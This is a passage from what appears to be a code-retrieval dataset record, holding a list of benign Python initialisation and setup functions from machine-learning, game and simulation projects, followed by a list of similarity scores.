/ num_particles for _ in range(num_particles)])\n self.n = num_particles\n self.sense_noise = sense_noise", "def setup(self):\n self.star_list = arcade.SpriteList()\n\n for i in range(50):\n # Create snowflake instance\n singlestar = Singlestar()\n # Add snowflake to snowflake list\n self.star_list.append(singlestar)\n\n # Don't show the mouse pointer\n self.set_mouse_visible(False)\n\n # Set the background color\n arcade.set_background_color(arcade.color.BLACK)", "def initialize(self):\n self.gc1.reset_parameters()\n self.gc2.reset_parameters()\n\n for s in self.scores:\n stdv = 1. / math.sqrt(s.size(1))\n s.data.uniform_(-stdv, stdv)\n for b in self.bias:\n # fill in b with postive value to make\n # score s closer to 1 at the beginning\n b.data.fill_(self.bias_init)\n\n for Dk in self.D_k:\n stdv = 1. / math.sqrt(Dk.size(1))\n Dk.data.uniform_(-stdv, stdv)\n\n for b in self.D_bias:\n b.data.fill_(0)", "def __init__(self, **kwargs):\n super(VeryCleverBeamsplitter, self).__init__(**kwargs)\n self.shader_source = IL_SHADER_SOURCE\n self.centre = [0.5, 0.5]\n self.blazing_function = np.linspace(0,1,32)\n self.zernike_coefficients = np.zeros(12)", "def __init__(self):\n self.last_reward_pos = 0\n super().__init__()\n self.TERRAIN_VARIANCE = 0.0\n self.stump_spacing = 4.0\n self.stump_height = 1.0\n self.my_init({'leg_length': 35, 'walker_type': 'default'})", "def gff_init():\n pass", "def __init__(self):\n\t\t# Setup fonts\n\t\tself.large_font = self._get_font(1,Annotator.THICK)\n\t\tself.large_font_outline = self._get_font(1,Annotator.THICK + Annotator.BORDER)\n\t\t\n\t\tself.small_font = self._get_font(0.5,Annotator.THIN)\n\t\tself.small_font_outline = self._get_font(0.5,Annotator.THIN + Annotator.BORDER)\n\t\t\n\t\t# Text colour\n\t\tself.colour = Annotator.COLOUR_BUSY\n\t\t\n\t\tself.forehead = (0,0,1,1)\n\t\tself.face = (0,0,1,1)", "def generate_gazettes(self):\n # TODO: generate_gazettes\n pass", "def __init__(self, styles, nature):\n #: Dictionary of key-value pairs, where *keys* are the style names.\n self.styles = styles\n\n #: Cell *nature* used to distinguish the body cells, from the header and the footer.\n self.nature = nature", "def init_model(model):\n model(tf.random.uniform((1, 512, 512, 3)))", "def __init__(self, *args):\n _hypre.HypreBoomerAMG_swiginit(self, _hypre.new_HypreBoomerAMG(*args))", "def init(self):\n sys_init_lines = CodeWriter.write_init()\n self.init_lines.extend(sys_init_lines)", "def init(init_state) -> GelmanRubinState:\n n_chains, n_dims = init_state.position.shape\n w_state = w_init(n_chains, n_dims)\n return GelmanRubinState(w_state, 0, jnp.nan)", "def feed_parser_initialization(generator):\n\n generator.plugin_instance = GitHubActivity(generator)", "def initialize( self, layout, numGhostAgents=1000 ):\n self.data.initialize(layout, numGhostAgents) ##self.data is defined in the Grid() class of game.py REF112.It creates an initial game state from a layout array (see layout.py).", "def __init__(\n self, config: SimpleGCNConfig = SimpleGCNConfig(name=\"simplegcn\")\n ):\n super().__init__()\n self.edge_lengthscale = config.edge_lengthscale\n self.weight_edges = config.weight_edges\n\n self.atom_embedding = nn.Linear(\n config.atom_input_features, config.width\n )\n\n self.layer1 = GraphConv(config.width, config.width)\n self.layer2 = GraphConv(config.width, config.output_features)\n self.readout = AvgPooling()", "def __init__(self, generator:Model,\n discriminator:Model,\n latent_dim:Optional[Union[int, Tuple]]=None,\n n_disc:int=3,\n epochs:int=100, \n 
batch_size:int=32,\n optimizer:Optional[Union[str, Dict]]=None,\n optimizer_kwargs:Optional[Dict]=None,\n name:str='QGAN',\n random_state:Optional[int]=None,\n checkpoint_dir:Optional[str]=None,\n checkpoint_interval:int=10,\n checkpoint_max_to_keep:Optional[int]=None):\n super().__init__(generator=generator,\n discriminator=discriminator,\n latent_dim=latent_dim,\n n_disc=n_disc,\n epochs=epochs,\n batch_size=batch_size,\n optimizer=optimizer,\n optimizer_kwargs=optimizer_kwargs,\n name=name,\n random_state=random_state,\n checkpoint_dir=checkpoint_dir,\n checkpoint_interval=checkpoint_interval,\n checkpoint_max_to_keep=checkpoint_max_to_keep)", "def generate(self):\n self.generate_points()\n self.generate_edges()", "def __init__( self, config: 'bittensor.config' = None ):\n if config == None: config = neuron.config()\n self.config = config; neuron.check_config( self.config ); print ( self.config )\n bittensor.logging (\n config = self.config,\n logging_dir = self.config.neuron.full_path,\n )\n self.device = torch.device(\n device = self.config.neuron.device\n )\n self.wallet = bittensor.wallet(\n config = self.config\n )\n self.dendrite = bittensor.dendrite(\n config = self.config,\n wallet = self.wallet\n )\n self.subtensor = bittensor.subtensor(\n config = self.config\n )\n self.metagraph = bittensor.metagraph(\n config = self.config\n )\n self.axon = bittensor.axon (\n config = self.config,\n wallet = self.wallet,\n forward_callback = self.forward,\n backward_callback = self.backward\n )\n self.dataset = bittensor.dataloader (\n config = self.config\n )\n self.router = SGMOERouter(\n config = self.config\n ).to( self.device )\n self.nucleus = GPT2Nucleus(\n config = self.config,\n routing_callback = self.route\n ).to( self.device )\n self.optimizer = torch.optim.SGD(\n [\n {\"params\": self.router.parameters()},\n {\"params\": self.nucleus.parameters()}\n ],\n lr = self.config.neuron.learning_rate,\n weight_decay = self.config.neuron.weight_decay,\n )\n self.tensorboard = SummaryWriter(\n log_dir = self.config.neuron.tensorboard_dir\n )\n self.mechanism_weights = torch.ones( [0] )\n self.epoch = 0\n self.global_step = 0\n self.epoch_loss = math.inf/2\n self.best_epoch_loss = math.inf", "def init_data_generator(config_tuple, data_dir):\n\n (_preprocess_function, flags) = config_tuple\n rescale = 1. 
/ 255 if _preprocess_function is None else None\n image_sizes = (flags.image_width, flags.image_height)\n batch_size = flags.batch_size\n # Configure test generator\n train_datagen = ImageDataGenerator(\n preprocessing_function=_preprocess_function,\n rescale=rescale,\n rotation_range=30,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True\n )\n # Configure test data flow\n train_generator = train_datagen.flow_from_directory(\n data_dir,\n target_size=image_sizes,\n batch_size=batch_size,\n )\n\n return train_generator", "def __init__(self):\n self.monsters_images = pg.sprite.Group()\n self.font_23 = pg.font.Font(prepare.FONTS['Timeless-Bold'], 23)\n self.font_20 = pg.font.Font(prepare.FONTS['Timeless'], 20)\n self.font_18 = pg.font.Font(prepare.FONTS['Timeless'], 18)\n self.bold_font = pg.font.Font(prepare.FONTS['Timeless-Bold'], 17)\n self.font_15 = pg.font.Font(prepare.FONTS['Timeless'], 15)\n\n self.init_left_zone()\n self.init_middle_zone()\n self.init_right_zone()", "def initialise(self):", "def setUp(self):\n self.G = nx.DiGraph()", "def __init__(self, n, sick_init, social_dist, radius=0.01, styles=None, total_beds=10, box_length=1, recovery_time=1000):\n\n self.init_persons(n, sick_init, social_dist, radius, box_length, recovery_time, total_beds, styles)\n self.init_hospital(total_beds)", "def init(self):", "def init(self):", "def get_generator(upscale_factor, init_gain):\n net = Generator(upscale_factor)\n init_weights(net, 'normal', init_gain)\n return net", "def __init__(self, init_grid=None):\n\n self.height = len(init_grid)\n self.width = len(init_grid[0])\n\n self.grid = [[Cell(self, c) for c in row]\n for row in init_grid]\n\n self.g = nx.Graph()\n self.tangle()", "def run_init(self):\n InitEditor(self.root, self)", "def __init__(self, obs_dim, *, seed=None):\n # TODO: apply jax.jit() to everything in sight\n net_init, self._net_apply = self.make_stax_model()\n if seed is None:\n # oh well\n seed = np.random.randint((1 << 63) - 1)\n rng = jrandom.PRNGKey(seed)\n out_shape, self._net_params = net_init(rng, (-1, obs_dim))\n self._net_grads = jax.grad(self._net_apply)\n # output shape should just be batch dim, nothing else\n assert out_shape == (-1,), \"got a weird output shape %s\" % (out_shape,)" ]
[ "0.70487845", "0.644251", "0.63743216", "0.6038303", "0.5973697", "0.59719676", "0.5944061", "0.5878216", "0.5834873", "0.58195704", "0.5817429", "0.5784765", "0.5783701", "0.577011", "0.57584363", "0.57117826", "0.5703821", "0.5685936", "0.5671047", "0.5652533", "0.5648202", "0.5644233", "0.5643345", "0.5630216", "0.56297874", "0.5616319", "0.5612629", "0.5608074", "0.5607538", "0.5602886", "0.5597174", "0.55802935", "0.55463666", "0.55315226", "0.55303335", "0.5528203", "0.55185384", "0.5492478", "0.5490245", "0.5480318", "0.5479667", "0.5479187", "0.5459767", "0.5458566", "0.5454134", "0.54527843", "0.54508626", "0.5450451", "0.544978", "0.54433984", "0.54379183", "0.5426694", "0.5421105", "0.5418665", "0.5418569", "0.54063433", "0.5405244", "0.5405244", "0.5405244", "0.5405244", "0.5405244", "0.5405244", "0.5405244", "0.5405244", "0.5383103", "0.5381276", "0.5380196", "0.53788584", "0.53728354", "0.53709114", "0.536323", "0.5352759", "0.5341801", "0.5341327", "0.53363895", "0.53284967", "0.5325164", "0.532388", "0.5323024", "0.5317661", "0.53127456", "0.5309524", "0.5299933", "0.52927876", "0.5291992", "0.52901864", "0.5287619", "0.52867115", "0.52846605", "0.5282077", "0.52765656", "0.52692837", "0.52659553", "0.5259445", "0.5256852", "0.52560925", "0.52560925", "0.52540183", "0.5250527", "0.52472764", "0.52439225" ]
0.0
-1
Remove weight normalization module from all of the layers.
def remove_weight_norm(self):
    def _remove_weight_norm(m):
        try:
            logging.debug(f"Weight norm is removed from {m}.")
            torch.nn.utils.remove_weight_norm(m)
        except ValueError:  # this module didn't have weight norm
            return

    self.apply(_remove_weight_norm)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_norms(module_: \"WN\") -> \"WN\":\n module_.start = torch.nn.utils.remove_weight_norm(module_.start_conv)\n module_.cond_layer = torch.nn.utils.remove_weight_norm(module_.cond_layer)\n for i, layer_ in enumerate(module_.in_layers):\n layer_ = DepthwiseSeparableConv1d.remove_batch_norm(layer_)\n module_.in_layers[i] = layer_\n for i, layer_ in enumerate(module_.res_skip_layers):\n layer_ = torch.nn.utils.remove_weight_norm(layer_)\n module_.res_skip_layers[i] = layer_\n return module_", "def remove_weight_norm_(self):\n\n def _remove_weight_norm(m):\n try:\n torch.nn.utils.remove_weight_norm(m)\n except ValueError:\n return\n\n self.apply(_remove_weight_norm)", "def remove_norms(self):\n dev = next(self.parameters()).device\n for name, module in self.named_modules():\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0_reverse')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_weight_norm(module)\n print(\"Removed wnorm from {}\".format(name))\n except:\n pass\n self.to(device=dev)", "def remove_norms(model: \"SqueezeWave\") -> \"SqueezeWave\":\n squeeze_wave = model\n for i, wn_layer in enumerate(squeeze_wave.wn_layers):\n squeeze_wave.wn_layers[i] = WN.remove_norms(wn_layer)\n return squeeze_wave", "def remove_activation_hooks(self):\n for h in self.hooks:\n h.remove()\n h = None\n for l in self.list_mods:\n if ('norm' in self.list_mods):\n (b, l) = l\n # Skip non-prunable layers\n if (hasattr(l, 'prune_values')):\n l.prune_values = None\n self.hooks = None", "def reset_weights(self):\n self.policy_backbone.reset_weights()\n self.value_backbone.reset_weights()\n self.action_head.reset_weights()\n self.critic_head.reset_weights()", "def remove_batchnorm(m: nn.Sequential) -> None:\n ms = list(m._modules.items())\n\n # transfer biases from BN to previous conv / Linear / Whatever\n for (name1, mod1), (name2, mod2) in zip(ms[:-1], ms[1:]):\n if isinstance(mod2, (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)):\n if mod1.bias is not None:\n continue\n\n if mod2.bias is not None:\n with torch.no_grad():\n mod1.bias = mod2.bias\n else:\n out_ch = len(mod2.running_mean)\n with torch.no_grad():\n mod1.bias = nn.Parameter(torch.zeros(out_ch))\n # remove bn\n for name, mod in ms:\n if isinstance(mod, (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)):\n delattr(m, name)", "def _initialize_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0, 0.05)\r\n if m.bias is not None:\r\n m.bias.data.zero_()", "def RemoveBatchNormLayers(network, batch_norm_names):\n i = 0\n j = 0\n while i < len(network.layer) and j < len(batch_norm_names): \n if network.layer[i].name == batch_norm_names[j]:\n del network.layer[i]\n j += 1\n else:\n i += 1\n \n if j != len(batch_norm_names):\n print j, len(batch_norm_names)\n raise AssertionError('All batch norm layers were not removed')", "def normalize_weights(self):\n total_weight = sum(self.weights)\n self.norm_weights = self.weights / float(total_weight)", "def remove_weight_norm_and_equal_lr(module: Module,\n name: str = 'weight') -> Module:\n return remove_weight_lambda(module, 'norm_equal_lr', name)", "def _init_weights(self):\n for m in self.modules():\n if type(m) in {\n nn.Linear,\n nn.Conv3d,\n nn.Conv2d,\n nn.ConvTranspose2d,\n nn.ConvTranspose3d\n }:\n nn.init.kaiming_normal_(\n m.weight.data, a=0, 
mode='fan_out', nonlinearity='relu',\n )\n if m.bias is not None:\n fan_in, fan_out = \\\n nn.init._calculate_fan_in_and_fan_out(m.weight.data)\n bound = 1 / math.sqrt(fan_out)\n nn.init.normal_(m.bias, -bound, bound)", "def _setWeights(self):\r\n for layer in self.layer_names:\r\n raw_w = getattr(self, f'{layer}_raw')\r\n self.module._parameters[layer] = F.dropout(raw_w, p=self.weight_pro, training=self.training)", "def normalizeWeights(self):\n for wt in self.weights:\n wt[wt>1] = 1\n wt[wt<-1] = -1\n for bs in self.bias:\n bs[bs>1] = 1\n bs[bs<-1] = -1", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def reset_weights(self):\n self.head.reset_weights()", "def reset_all_weights(model: nn.Module) -> None:\n\n @torch.no_grad()\n def weight_reset(m: nn.Module):\n # - check if the current module has reset_parameters & if it's callabed called it on m\n reset_parameters = getattr(m, \"reset_parameters\", None)\n if callable(reset_parameters):\n m.reset_parameters()\n\n # Applies fn recursively to every submodule see: https://pytorch.org/docs/stable/generated/torch.nn.Module.html\n model.apply(fn=weight_reset)", "def associate_normalization_layers(self, model):\n if (len(self.leaf_modules) == 0):\n self.retrieve_leaf_modules(model) \n # Association list\n self.norm_modules = []\n self.prune_modules = []\n # Current weighted layer\n cur_weighted = None\n # Associate norm layers to their immediate previous weighted layers\n for name, m in self.leaf_modules:\n if (m.__class__ in [nn.Linear, nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.ConvTranspose2d, nn.ConvTranspose3d]):\n cur_weighted = m\n if (m.__class__ in [nn.RNN, nn.GRU, nn.LSTM]):\n cur_weighted = m\n if ('Norm' in str(m.__class__)):\n if (cur_weighted is not None):\n self.norm_modules.append((m, cur_weighted))", "def reset(self):\n for layer in self.network:\n layer.clean()", "def remove_weight_scale(module: Module, name: str = 'weight') -> Module:\n return remove_weight_lambda(module, 'scale', name)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n xavier_uniform_(m.weight)\n if m.bias is not None:\n zeros_(m.bias)", "def unfreeeze_all_layers(self):\n # Unfreeeze\n logger.info('MODEL: Unfreeze all layers.')\n for i in range(len(self.model.layers)):\n self.model.layers[i].trainable = True\n \n # Compile model\n logger.info('MODEL: Compiling...')\n self.model.compile(optimizer = Adam(lr=1e-4),\n loss={'yolo_loss': lambda y_true, y_pred: y_pred})", "def init_weights(self):\n # We don't use the `init_weights()` function in BaseModule, since it\n # doesn't support 
the initialization method from `reset_parameters()`\n # in Pytorch.\n if self.with_backbone:\n self.backbone.init_weights()\n\n if self.with_neck:\n for m in self.neck.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()\n\n if self.with_head:\n for m in self.head.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()", "def reset_model(model):\n\n\tfor layer in model.layers:\n\t\t# Note: these are custom depending on the layer type\n\t\tif '.MoleculeConv' in str(layer):\n\t\t\tW_inner = layer.init_inner((layer.inner_dim, layer.inner_dim))\n\t\t\tb_inner = np.zeros((1, layer.inner_dim))\n\t\t\t# Inner weights\n\t\t\tlayer.W_inner.set_value((T.tile(W_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, layer.inner_dim, layer.inner_dim)).eval()).astype(np.float32))\n\t\t\tlayer.b_inner.set_value((T.tile(b_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, 1, layer.inner_dim)).eval()).astype(np.float32))\n\n\t\t\t# Outer weights\n\t\t\tW_output = layer.init_output((layer.inner_dim, layer.units), scale = layer.scale_output)\n\t\t\tb_output = np.zeros((1, layer.units))\n\t\t\t# Initialize weights tensor\n\t\t\tlayer.W_output.set_value((T.tile(W_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlayer.b_output.set_value((T.tile(b_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlogging.info('graphFP layer reset')\n\n\t\telif '.Dense' in str(layer):\n\t\t\tlayer.W.set_value((layer.init(layer.W.shape.eval()).eval()).astype(np.float32))\n\t\t\tlayer.b.set_value(np.zeros(layer.b.shape.eval(), dtype=np.float32))\n\t\t\tlogging.info('dense layer reset')\n\n\t\telif '.Dropout' in str(layer):\n\t\t\tlogging.info('dropout unchanged')\n\t\telse:\n\t\t\traise ValueError('Unknown layer {}, cannot reset weights'.format(str(layer)))\n\tlogging.info('Reset model weights')\n\treturn model", "def _reset_weights(m):\n\n nn = import_optional_dependency(\"torch.nn\")\n init = import_optional_dependency(\"torch.nn.init\")\n if isinstance(m, nn.Conv1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm1d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm3d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.Linear):\n init.xavier_normal_(m.weight.data)\n init.normal_(m.bias.data)\n elif isinstance(m, nn.LSTM):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.LSTMCell):\n for param in m.parameters():\n 
if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRU):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRUCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)", "def remove_tracking(model, norm_type, norm_power=0.2):\n normlayer = select_norm(norm_type, norm_power=norm_power)\n # find total number of childern\n model_len = 0\n for n, child in enumerate(model.children()):\n model_len = n\n\n # for layer 0 which is outside\n conv_shape = model.conv1.out_channels\n w = model.bn1.weight\n b = model.bn1.bias\n model.bn1 = normlayer(conv_shape)\n model.bn1.weight = w\n model.bn1.bias = b\n\n # replace in all other layers\n for n, child in enumerate(model.children()):\n if 4 <= n <= model_len - 2:\n for i in range(len(child)):\n conv_shape = child[i].conv1.out_channels\n w = child[i].bn1.weight\n b = child[i].bn1.bias\n child[i].bn1 = normlayer(conv_shape)\n child[i].bn1.weight = w\n child[i].bn1.bias = b\n\n conv_shape = child[i].conv2.out_channels\n w = child[i].bn2.weight\n b = child[i].bn2.bias\n child[i].bn2 = normlayer(conv_shape)\n child[i].bn2.weight = w\n child[i].bn2.bias = b\n # if model have bn3 as well\n try:\n conv_shape = child[i].conv3.out_channels\n w = child[i].bn3.weight\n b = child[i].bn3.bias\n child[i].bn3 = normlayer(conv_shape)\n child[i].bn3.weight = w\n child[i].bn3.bias = b\n except:\n pass\n try:\n conv_shape = child[i].downsample[0].out_channels\n w = child[i].downsample[1].weight\n b = child[i].downsample[1].bias\n child[i].downsample[1] = normlayer(conv_shape)\n child[i].downsample[1].weight = w\n child[i].downsample[1].bias = b\n print(\"downsample\")\n except:\n print(\"no downsample\")\n\n return model", "def remove_spectral_norm(module, name='weight'):\n for k, hook in module._forward_pre_hooks.items():\n if isinstance(hook, SpectralNorm) and hook.name == name:\n hook.remove(module)\n del module._forward_pre_hooks[k]\n return module\n\n raise ValueError(\"spectral_norm of '{}' not found in {}\".format(\n name, module))", "def reset_weights(self):\r\n self._weights = deepcopy(self._tmp_weights)\r\n self._tmp_weights = None", "def normalize_weights(self):\n \n # Set negative weights to zero\n # Normalize to sum to one.\n \n\n\n self.new_weight=[]\n for i in self._weights:\n if any(i < 0 for i in self._weights):\n self.new_weight = [0,1]\n\n elif all(i == 0 for i in self._weights):\n i = 1/len(self._weights)\n self.new_weight.append(i)\n else:\n i = i/sum(self._weights)\n self.new_weight.append(i)\n\n # If the weights are all zeros, set weights equal to 1/k, where k is the number\n # of components.\n self._weights = self.new_weight\n self._weights = np.round(self._weights,3)", "def freeze_model(self):\n # BN layers need to be freezed explicitly since they cannot be freezed via '.requires_grad=False'\n for module in self.modules():\n if isinstance(module, (nn.BatchNorm2d, nn.GroupNorm)):\n module.eval()\n \n # freeze all parameters\n for param in self.parameters():\n param.requires_grad = False", "def update_weights(self):\n\n self.weights -= self.loss_grads\n self.loss_grads = np.zeros(self.weights.shape)", "def reset(self):\n self._weights.clear()", "def init_weights(self, module):\n if isinstance(module, (torch.nn.Linear, torch.nn.Embedding, torch.nn.LayerNorm)):\n module.weight.data.normal_(mean=0.0, 
std=self.initializer_range)\n if isinstance(module, (torch.nn.Linear, torch.nn.LayerNorm)) and module.bias is not None:\n module.bias.data.zero_()", "def reset_parameters(self) -> None:\n for name, param in self.named_parameters():\n if not (name == 'word_embedding.weight' and self.use_pretrained_embeddings):\n nn.init.normal(param, std=0.1)", "def _rescale_module(module):\n for sub in module.modules():\n if isinstance(sub, (nn.Conv1d, nn.ConvTranspose1d, nn.Conv2d, nn.ConvTranspose2d)):\n std = sub.weight.std().detach()\n scale = (std / 0.1) ** 0.5\n sub.weight.data /= scale\n if sub.bias is not None:\n sub.bias.data /= scale", "def _set_freeze_layers(self):\n for layer in self.encoder.layers[:self.freeze_layers]:\n layer.trainable = False", "def reset_parameters(self):\n model_utils.truncated_normal_(self.weight, mean=0.0, std=0.1)\n model_utils.truncated_normal_(self.bias, mean=0.0, std=0.1)", "def apply_weight_norm(self):\n\n def _apply_weight_norm(m):\n if isinstance(m, torch.nn.Conv1d) or isinstance(\n m, torch.nn.ConvTranspose1d\n ):\n torch.nn.utils.weight_norm(m)\n logging.debug(f\"Weight norm is applied to {m}.\")\n\n self.apply(_apply_weight_norm)", "def apply_weight_norm(self):\n\n def _apply_weight_norm(m):\n if isinstance(m, torch.nn.Conv1d) or isinstance(\n m, torch.nn.ConvTranspose1d\n ):\n torch.nn.utils.weight_norm(m)\n logging.debug(f\"Weight norm is applied to {m}.\")\n\n self.apply(_apply_weight_norm)", "def apply_weight_norm(self):\n\n def _apply_weight_norm(m):\n if isinstance(m, torch.nn.Conv1d) or isinstance(\n m, torch.nn.ConvTranspose1d\n ):\n torch.nn.utils.weight_norm(m)\n logging.debug(f\"Weight norm is applied to {m}.\")\n\n self.apply(_apply_weight_norm)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m)", "def set_to_zero_model_weights(model):\n\n for layer_weigths in model.parameters():\n layer_weigths.data.sub_(layer_weigths.data)", "def clear(self):\n for i in range(0, len(self.weights)):\n self.weights[i] = 0", "def init_weights(layer):\r\n layer_name = layer.__class__.__name__\r\n if layer_name.find(\"Conv\") != -1:\r\n layer.weight.data.normal_(0.0, 0.02)\r\n elif layer_name.find(\"BatchNorm\") != -1:\r\n layer.weight.data.normal_(1.0, 0.02)\r\n layer.bias.data.fill_(0)", "def init_weights(layer):\n layer_name = layer.__class__.__name__\n if layer_name.find(\"Conv\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(0.0, 0.02)\n elif layer_name.find(\"BatchNorm\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(1.0, 0.02)\n layer.bias.data.fill_(0)", "def normalize_weights(self, w):\n n = w.astype(np.float64, copy=True)\n c = float(np.sum(w))\n n /= c\n return n", "def initialize_weights(self):\n for layer in self._cnn_layers:\n weights_initializer.WeightsInitializer.initialize_layer_or_model(layer)", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def normalize_weight(self, Z):\n self.weight /= Z", "def init_weights(self):\n with torch.no_grad():\n self._init_weights()", "def reset(self):\n ih = (param for name, param in self.named_parameters() if 'weight_ih' in name)\n hh = (param for name, param in self.named_parameters() if 'weight_hh' in name)\n b = (param for 
name, param in self.named_parameters() if 'bias' in name)\n for t in ih:\n torch.nn.init.xavier_uniform_(t)\n for t in hh:\n torch.nn.init.orthogonal_(t)\n for t in b:\n torch.nn.init.constant_(t, 0)", "def init_weights(self, clz):\n for ch in self.children():\n if issubclass(ch.__class__, nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: clz._init_weights(self.lrm, module))", "def clear_layers_name():\n set_keep['_layers_name_list'] =[]", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)", "def reset_nn(self): # Clear current network\n self.weights = np.zeros((p.num_rovers, self.n_weights))\n self.in_layer = np.zeros((p.num_rovers, self.n_inputs))\n self.hid_layer = np.zeros((p.num_rovers, self.n_nodes))\n self.out_layer = np.zeros((p.num_rovers, self.n_outputs))", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def unfreeze_layers(model: torch.nn.Module) -> None:\n for param in model.parameters():\n param.requires_grad = True", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.projection_matrices.data = normalize(self.projection_matrices.data, p=2, dim=2)", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.ent_proj_vects.data = normalize(self.ent_proj_vects.data, p=2, dim=1)\n self.rel_proj_vects.data = normalize(self.rel_proj_vects.data, p=2, dim=1)", "def reset_weights(self):\n np.random.seed(self.seed)\n self.node_embedding = xavier_normal(size=(self.vocab_size, self.layer1_size), as_type=np.float32)\n self.context_embedding = xavier_normal(size=(self.vocab_size, self.layer1_size), as_type=np.float32)\n\n\n self.centroid = np.zeros((self.k, self.layer1_size), dtype=np.float32)\n self.covariance_mat = np.zeros((self.k, self.layer1_size, self.layer1_size), dtype=np.float32)\n 